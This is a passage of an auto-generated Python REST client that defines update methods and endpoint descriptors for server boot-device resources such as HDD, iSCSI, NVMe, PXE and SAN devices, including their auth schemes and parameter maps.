        BootDeviceBootMode
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_device_boot_mode'] = boot_device_boot_mode
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for the update operation on
# /api/v1/boot/DeviceBootModes/{Moid}; dispatches to the
# __update_boot_device_boot_mode closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.update_boot_device_boot_mode = _Endpoint(
    settings={
        'response_type': (BootDeviceBootMode,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootModes/{Moid}',
        'operation_id': 'update_boot_device_boot_mode',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_device_boot_mode',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_device_boot_mode',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_device_boot_mode':
                (BootDeviceBootMode,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_device_boot_mode': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_device_boot_mode
)
def __update_boot_device_boot_security(
    self,
    moid,
    boot_device_boot_security,
    **kwargs
):
    """Update a 'boot.DeviceBootSecurity' resource. # noqa: E501

    The request is synchronous by default; pass async_req=True to run it
    asynchronously, in which case the request thread is returned.

    >>> thread = api.update_boot_device_boot_security(moid, boot_device_boot_security, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_device_boot_security (BootDeviceBootSecurity): The 'boot.DeviceBootSecurity' resource to update.

    Keyword Args:
        if_match (str): If-Match precondition header. Set it to the
            ModTime of the resource as last fetched to guard against the
            lost-update problem; the server replies with 412
            (Precondition Failed) when the precondition is not met.
            [optional]
        _return_http_data_only (bool): return the response data only,
            without status code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse
            object is returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default is None.
        _check_input_type (bool): type-check the data sent to the
            server. Default is True.
        _check_return_type (bool): type-check the data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootDeviceBootSecurity
        If the method is called asynchronously, returns the request
        thread.
    """
    # Merge the standard request options into kwargs, preserving any
    # caller-supplied values, then attach the required parameters and
    # hand the call off to the shared endpoint machinery.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    kwargs['boot_device_boot_security'] = boot_device_boot_security
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for the update operation on
# /api/v1/boot/DeviceBootSecurities/{Moid}; dispatches to the
# __update_boot_device_boot_security closure defined above.
# NOTE: the generator emitted 'oAuth2' twice in the auth list; auth
# settings are applied per scheme name, so the duplicate entry was
# redundant and has been removed.
self.update_boot_device_boot_security = _Endpoint(
    settings={
        'response_type': (BootDeviceBootSecurity,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/DeviceBootSecurities/{Moid}',
        'operation_id': 'update_boot_device_boot_security',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_device_boot_security',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_device_boot_security',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_device_boot_security':
                (BootDeviceBootSecurity,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_device_boot_security': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_device_boot_security
)
def __update_boot_hdd_device(
    self,
    moid,
    boot_hdd_device,
    **kwargs
):
    """Update a 'boot.HddDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_hdd_device(moid, boot_hdd_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_hdd_device (BootHddDevice): The 'boot.HddDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootHddDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_hdd_device'] = boot_hdd_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_hdd_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_hdd_device = _Endpoint(
    settings={
        'response_type': (BootHddDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/HddDevices/{Moid}',
        'operation_id': 'update_boot_hdd_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_hdd_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_hdd_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_hdd_device':
                (BootHddDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_hdd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_hdd_device
)
def __update_boot_iscsi_device(
    self,
    moid,
    boot_iscsi_device,
    **kwargs
):
    """Update a 'boot.IscsiDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_iscsi_device(moid, boot_iscsi_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_iscsi_device (BootIscsiDevice): The 'boot.IscsiDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootIscsiDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_iscsi_device'] = boot_iscsi_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_iscsi_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_iscsi_device = _Endpoint(
    settings={
        'response_type': (BootIscsiDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/IscsiDevices/{Moid}',
        'operation_id': 'update_boot_iscsi_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_iscsi_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_iscsi_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_iscsi_device':
                (BootIscsiDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_iscsi_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_iscsi_device
)
def __update_boot_nvme_device(
    self,
    moid,
    boot_nvme_device,
    **kwargs
):
    """Update a 'boot.NvmeDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_nvme_device(moid, boot_nvme_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_nvme_device (BootNvmeDevice): The 'boot.NvmeDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootNvmeDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_nvme_device'] = boot_nvme_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_nvme_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_nvme_device = _Endpoint(
    settings={
        'response_type': (BootNvmeDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/NvmeDevices/{Moid}',
        'operation_id': 'update_boot_nvme_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_nvme_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_nvme_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_nvme_device':
                (BootNvmeDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_nvme_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_nvme_device
)
def __update_boot_pch_storage_device(
    self,
    moid,
    boot_pch_storage_device,
    **kwargs
):
    """Update a 'boot.PchStorageDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_pch_storage_device(moid, boot_pch_storage_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_pch_storage_device (BootPchStorageDevice): The 'boot.PchStorageDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootPchStorageDevice, or the request thread when called
        asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_pch_storage_device'] = boot_pch_storage_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_pch_storage_device: maps each
# parameter to its OpenAPI type and request location (path/body/header)
# and binds the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_pch_storage_device = _Endpoint(
    settings={
        'response_type': (BootPchStorageDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PchStorageDevices/{Moid}',
        'operation_id': 'update_boot_pch_storage_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_pch_storage_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_pch_storage_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_pch_storage_device':
                (BootPchStorageDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_pch_storage_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_pch_storage_device
)
def __update_boot_precision_policy(
    self,
    moid,
    boot_precision_policy,
    **kwargs
):
    """Update a 'boot.PrecisionPolicy' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_precision_policy(moid, boot_precision_policy, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_precision_policy (BootPrecisionPolicy): The 'boot.PrecisionPolicy' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootPrecisionPolicy, or the request thread when called
        asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_precision_policy'] = boot_precision_policy
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_precision_policy: maps each
# parameter to its OpenAPI type and request location (path/body/header)
# and binds the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_precision_policy = _Endpoint(
    settings={
        'response_type': (BootPrecisionPolicy,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PrecisionPolicies/{Moid}',
        'operation_id': 'update_boot_precision_policy',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_precision_policy',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_precision_policy',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_precision_policy':
                (BootPrecisionPolicy,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_precision_policy': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_precision_policy
)
def __update_boot_pxe_device(
    self,
    moid,
    boot_pxe_device,
    **kwargs
):
    """Update a 'boot.PxeDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_pxe_device(moid, boot_pxe_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_pxe_device (BootPxeDevice): The 'boot.PxeDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootPxeDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_pxe_device'] = boot_pxe_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_pxe_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_pxe_device = _Endpoint(
    settings={
        'response_type': (BootPxeDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/PxeDevices/{Moid}',
        'operation_id': 'update_boot_pxe_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_pxe_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_pxe_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_pxe_device':
                (BootPxeDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_pxe_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_pxe_device
)
def __update_boot_san_device(
    self,
    moid,
    boot_san_device,
    **kwargs
):
    """Update a 'boot.SanDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_san_device(moid, boot_san_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_san_device (BootSanDevice): The 'boot.SanDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootSanDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_san_device'] = boot_san_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_san_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_san_device = _Endpoint(
    settings={
        'response_type': (BootSanDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SanDevices/{Moid}',
        'operation_id': 'update_boot_san_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_san_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_san_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_san_device':
                (BootSanDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_san_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_san_device
)
def __update_boot_sd_device(
    self,
    moid,
    boot_sd_device,
    **kwargs
):
    """Update a 'boot.SdDevice' resource. # noqa: E501

    Synchronous by default; pass async_req=True to issue the HTTP
    request asynchronously, in which case the request thread is
    returned instead of the result.

    >>> thread = api.update_boot_sd_device(moid, boot_sd_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_sd_device (BootSdDevice): The 'boot.SdDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header value (the resource
            ModTime) used to guard against the lost-update problem when
            modifying a resource with POST or PUT. [optional]
        _return_http_data_only (bool): return response data without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootSdDevice, or the request thread when called asynchronously.
    """
    # Apply framework defaults only where the caller supplied nothing.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel to the endpoint via the kwargs map.
    kwargs['moid'] = moid
    kwargs['boot_sd_device'] = boot_sd_device
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for update_boot_sd_device: maps each parameter
# to its OpenAPI type and request location (path/body/header) and binds
# the private request callable defined above.
# NOTE(review): 'oAuth2' appears twice in 'auth' — looks like a
# generator artifact; confirm it is harmless before deduplicating.
self.update_boot_sd_device = _Endpoint(
    settings={
        'response_type': (BootSdDevice,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'
        ],
        'endpoint_path': '/api/v1/boot/SdDevices/{Moid}',
        'operation_id': 'update_boot_sd_device',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
            'boot_sd_device',
            'if_match',
        ],
        'required': [
            'moid',
            'boot_sd_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
            'boot_sd_device':
                (BootSdDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {
            'moid': 'path',
            'boot_sd_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_sd_device
)
def __update_boot_uefi_shell_device(
    self,
    moid,
    boot_uefi_shell_device,
    **kwargs
):
    """Update a 'boot.UefiShellDevice' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread
    back instead of the result.

    >>> thread = api.update_boot_uefi_shell_device(moid, boot_uefi_shell_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_uefi_shell_device (BootUefiShellDevice): The
            'boot.UefiShellDevice' resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header (resource ModTime) that
            guards against the lost-update problem; a stale value makes the
            server answer 412 (Precondition Failed). [optional]
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
